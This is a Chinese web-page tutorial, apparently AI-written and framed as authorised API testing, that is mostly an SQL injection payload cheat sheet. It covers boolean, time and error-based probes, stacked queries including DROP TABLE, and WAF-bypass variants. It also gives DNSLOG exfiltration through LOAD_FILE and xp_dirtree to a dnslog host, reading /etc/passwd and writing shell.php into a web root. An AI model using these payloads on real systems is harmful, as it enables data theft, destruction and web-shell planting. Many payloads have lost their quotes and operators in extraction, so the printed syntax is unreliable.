当前位置：首页 > article >正文

实战级SQL注入测试技巧揭秘

article 2026/3/26 17:15:31

目录一、高阶注入判断技巧不爆数据只测漏洞1. 布尔盲注Boolean-based2. 时间盲注Time-based3. 报错注入Error-based二、高阶利用手法实战渗透常用1. 堆叠查询Stacked Queries2. 宽字节注入绕过转义3. 绕过 WAF / 过滤的高级写法大小写变形注释穿插字符串编码等价函数替换空格绕过4. 二阶注入Second-Order SQLi5. 外带数据DNSLOG / HTTP 外带6. 读写文件三、针对不同数据库的专属高级注入MySQLSQL ServerPostgreSQLOracle四、接口测试中最实用的高阶组合流程下面给你整理一套更高级、实战化、但依然合规仅用于授权自检的 SQL 注入测试思路适合接口渗透、黑盒测试场景。我会尽量讲得实用、可直接上手不搞花里胡哨的理论。一、高阶注入判断技巧不爆数据只测漏洞1. 布尔盲注Boolean-based适用于不返回报错、不返回数据但页面内容会变。测试思路id1 AND 11-- - 页面正常 id1 AND 12-- - 页面异常/无数据两次结果不一样 →存在布尔盲注。进阶 payload AND (SELECT 1 FROM DUAL WHERE 11)-- AND (LENGTH(DATABASE())5)--2. 时间盲注Time-based适用于页面完全没变化连布尔差异都没有。核心让数据库 sleep看接口延迟。 AND SLEEP(5)-- AND IF(11,SLEEP(5),0)-- AND BENCHMARK(1000000,MD5(1))-- AND PG_SLEEP(5)-- PostgreSQL AND WAITFOR DELAY 0:0:5-- SQL Server如果接口明显延迟 5 秒→ 100% 存在注入。3. 报错注入Error-based不查数据只通过强制报错判断注入点。常用 AND UPDATEXML(1,CONCAT(0x7e,(SELECT 1)),1)-- AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT 1)))-- AND FLOOR(RAND(0)*2)-- group by 报错只要返回 XPath 语法错误等 → 存在注入。二、高阶利用手法实战渗透常用1. 堆叠查询Stacked Queries支持多语句执行时; SELECT * FROM user;-- ; DROP TABLE test;-- 严禁非法使用常见于SQL Server / PostgreSQL。2. 宽字节注入绕过转义针对 PHP MySQL 宽字符集GBK%df OR 11--原理%df\被解析成運单引号逃逸成功。3. 绕过 WAF / 过滤的高级写法很多接口有防护普通 payload 会被拦可以用这些变形大小写变形 Or 11-- oR 11--注释穿插 UN/**/ION SEL/**/ECT--字符串编码 UNION SELECT CHAR(97,100,109,105,110)--等价函数替换AND 11 → AND 2-11 → AND 32 → AND MID(VERSION(),1,1)5空格绕过%09、%0a、%0b、%0d、%a0、//、--例UNION%0aSELECT%0a1,2,3--4. 二阶注入Second-Order SQLi高级玩法存储型注入注册用户名admin后台查询时直接拼接触发点在另一个接口这类漏洞非常隐蔽普通扫描扫不出来。5. 外带数据DNSLOG / HTTP 外带MySQL 高权限可读取数据外带 AND LOAD_FILE(CONCAT(\\\\,(SELECT database()),.xxx.dnslog.cn\\test))--适用于完全盲注、无法回显的场景。SQL Server; EXEC master..xp_dirtree \\xxx.dnslog.cn\test;--6. 读写文件MySQL 权限足够时 UNION SELECT LOAD_FILE(/etc/passwd)-- INTO OUTFILE /var/www/html/shell.php--三、针对不同数据库的专属高级注入MySQL报错注入UPDATEXML、EXTRACTVALUE时间盲注SLEEP()读文件LOAD_FILESQL Server堆叠查询WAITFOR DELAYxp_cmdshell命令执行报错FORMATMESSAGEPostgreSQLPG_SLEEP(5)复制文件COPY任意语句执行Oracle报错CTX_REPORT盲注DBMS_LOCK.SLEEP联合查询限制多需要绕ROWNUM四、接口测试中最实用的高阶组合流程你做接口测试可以按这个顺序加单引号看是否报错布尔测试AND 11 / 12时间测试SLEEP(5)报错注入看能否触发尝试 WAF 绕过尝试二阶注入点

实战级SQL注入测试技巧揭秘

相关文章：

实战级SQL注入测试技巧揭秘

在给ppt接入扣子空间（Ai）/智能体，新玩法10分钟搞定说课，公开课AI互动！

kali制作木马

C++ 无原生 JSON 支持？一文实现通用序列化与反序列化封装方案

华硕笔记本性能困境突破：G-Helper工具的全方位优化方案

30分钟零基础入门：DJI Cloud API Demo实现无人机云平台集成的完整指南

DMG2IMG终极指南：3分钟掌握苹果DMG文件跨平台转换技巧

破解AutoDock Vina金属对接难题：3种专业方案实战深度解析

自动驾驶之心实习生招募｜上海线下，一起做点真东西

避坑指南：SpringBoot调用DeepSeek API时你可能会遇到的5个问题及解决方案

别再只用交叉熵了！医疗AI中疾病分级任务，试试PyTorch实现这个序数回归损失函数

S32DS隐藏技巧：用FTM定时器实现精准延时（替代低效for循环）

Go语言依赖管理：从GOPATH到Go Modules

【综述型文章】人工智能驱动的生物医学多模态数据融合与分析中的挑战

从零到一：在本地CentOS环境完整部署yshop-drink扫码点餐系统的实战指南

家里装了 OpenClaw，在公司也能随时管理——Shield CLI 远程访问方案

# Trae IDE `settings.json` 配置详解与教学文档

Java 核心四大基石：从 Object 源码到包装类陷阱的全维度复盘

如何在3分钟内为Axure RP配置中文界面：终极汉化指南

Proxmox VE虚拟化实战：如何给MikroTik RouterOS配置PCI直通网卡（ROS 6.44.2实测）

3大核心功能让你轻松掌握League-Toolkit英雄联盟辅助工具

SpringBoot WebSocket 客户端断线重连：从心跳检测到优雅恢复

SecGPT-14B实操手册：Gradio界面中temperature=0.3对安全答案确定性的影响

从零开始学流程图：GESP C++二级考试中的三种基本结构详解

ESP32 IDF环境下DHT11温湿度读取避坑指南：从时序图到数据拼接的完整解析

Path of Building完全指南：精准规划角色构筑3步法+高效配置策略

Mermaid CLI：从文本到图表的自动化解决方案

Android10音频系统实战：如何自定义音量曲线（附default_volume_tables.xml修改指南）

企业级Java SMB客户端：jcifs-ng深度架构解析与实战指南

【开题答辩全过程】以基于大数据的智能推送系统设计与实现为例，包含答辩的问题和答案